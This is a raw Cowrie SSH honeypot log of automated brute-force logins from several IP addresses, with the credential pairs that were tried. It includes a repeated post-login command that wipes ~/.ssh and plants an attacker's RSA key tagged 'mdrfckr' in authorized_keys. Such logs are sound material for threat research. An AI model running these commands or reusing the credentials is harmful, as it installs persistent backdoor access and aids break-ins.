{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:17:11.248930Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:17:11.493682Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:11.494618Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41686,"dst_ip":"1.2.3.4","dst_port":22,"session":"03c7744ac82e","protocol":"ssh","message":"New connection: 212.227.235.229:41686 (1.2.3.4:22) [session: 03c7744ac82e]","sensor":"my-vps","timestamp":"2025-09-09T06:17:11.736157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:17:11.737347Z","src_ip":"212.227.235.229","session":"03c7744ac82e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:17:11.980624Z","src_ip":"212.227.235.229","session":"03c7744ac82e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:17:13.001728Z","src_ip":"212.227.235.229","session":"03c7744ac82e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:14.248117Z","src_ip":"212.227.235.229","session":"03c7744ac82e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42526,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed5d30dff819","protocol":"ssh","message":"New connection: 212.227.235.229:42526 (1.2.3.4:22) [session: ed5d30dff819]","sensor":"my-vps","timestamp":"2025-09-09T06:17:14.493579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:17:14.494855Z","src_ip":"212.227.235.229","session":"ed5d30dff819"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:17:14.738755Z","src_ip":"212.227.235.229","session":"ed5d30dff819"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:17:15.753651Z","src_ip":"212.227.235.229","session":"ed5d30dff819"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:15.996058Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:15.999212Z","src_ip":"212.227.235.229","session":"ed5d30dff819"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50668,"dst_ip":"1.2.3.4","dst_port":22,"session":"88724361adb8","protocol":"ssh","message":"New connection: 212.227.235.229:50668 (1.2.3.4:22) [session: 88724361adb8]","sensor":"my-vps","timestamp":"2025-09-09T06:17:18.843210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:17:18.849360Z","src_ip":"212.227.235.229","session":"88724361adb8"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:17:19.020279Z","src_ip":"212.227.235.229","session":"88724361adb8"}
{"eventid":"cowrie.login.failed","username":"zookeeper","password":"Password1","message":"login attempt [zookeeper/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T06:17:19.710370Z","src_ip":"212.227.235.229","session":"88724361adb8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:20.892174Z","src_ip":"212.227.235.229","session":"88724361adb8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:41.427620Z","src_ip":"212.227.235.229","session":"75458e09c823"}
{"eventid":"cowrie.session.closed","duration":180.2398965358734,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:41.432630Z","src_ip":"212.227.235.229","session":"75458e09c823"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":46828,"dst_ip":"1.2.3.4","dst_port":22,"session":"422eae5f514a","protocol":"ssh","message":"New connection: 118.26.39.178:46828 (1.2.3.4:22) [session: 422eae5f514a]","sensor":"my-vps","timestamp":"2025-09-09T06:17:52.542209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:17:52.543142Z","src_ip":"118.26.39.178","session":"422eae5f514a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:17:53.784152Z","src_ip":"118.26.39.178","session":"422eae5f514a"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456789","message":"login attempt [developer/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T06:17:54.547940Z","src_ip":"118.26.39.178","session":"422eae5f514a"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:55.804146Z","src_ip":"118.26.39.178","session":"422eae5f514a"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.113.241","src_port":39950,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f6551b64d1b","protocol":"ssh","message":"New connection: 101.36.113.241:39950 (1.2.3.4:22) [session: 6f6551b64d1b]","sensor":"my-vps","timestamp":"2025-09-09T06:18:22.926527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:18:22.928293Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:18:23.133006Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.login.success","username":"root","password":"rockstar","message":"login attempt [root/rockstar] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:18:23.933968Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:18:24.381864Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:18:24.382693Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:18:24.383513Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:24.590590Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:18:25.012874Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:18:25.013653Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:18:25.217272Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:25.218271Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.113.241","src_port":40568,"dst_ip":"1.2.3.4","dst_port":22,"session":"98639a033473","protocol":"ssh","message":"New connection: 101.36.113.241:40568 (1.2.3.4:22) [session: 98639a033473]","sensor":"my-vps","timestamp":"2025-09-09T06:18:25.414354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:18:25.417021Z","src_ip":"101.36.113.241","session":"98639a033473"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:18:25.613896Z","src_ip":"101.36.113.241","session":"98639a033473"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:18:26.409623Z","src_ip":"101.36.113.241","session":"98639a033473"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:27.612746Z","src_ip":"101.36.113.241","session":"98639a033473"}
{"eventid":"cowrie.session.connect","src_ip":"101.36.113.241","src_port":41108,"dst_ip":"1.2.3.4","dst_port":22,"session":"96cd251c48f6","protocol":"ssh","message":"New connection: 101.36.113.241:41108 (1.2.3.4:22) [session: 96cd251c48f6]","sensor":"my-vps","timestamp":"2025-09-09T06:18:27.926516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:18:27.927315Z","src_ip":"101.36.113.241","session":"96cd251c48f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:18:28.185814Z","src_ip":"101.36.113.241","session":"96cd251c48f6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:18:29.260493Z","src_ip":"101.36.113.241","session":"96cd251c48f6"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:29.459502Z","src_ip":"101.36.113.241","session":"6f6551b64d1b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:18:29.518476Z","src_ip":"101.36.113.241","session":"96cd251c48f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45506,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec13190d660e","protocol":"ssh","message":"New connection: 212.227.235.229:45506 (1.2.3.4:22) [session: ec13190d660e]","sensor":"my-vps","timestamp":"2025-09-09T06:18:38.761517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:18:38.762833Z","src_ip":"212.227.235.229","session":"ec13190d660e"}
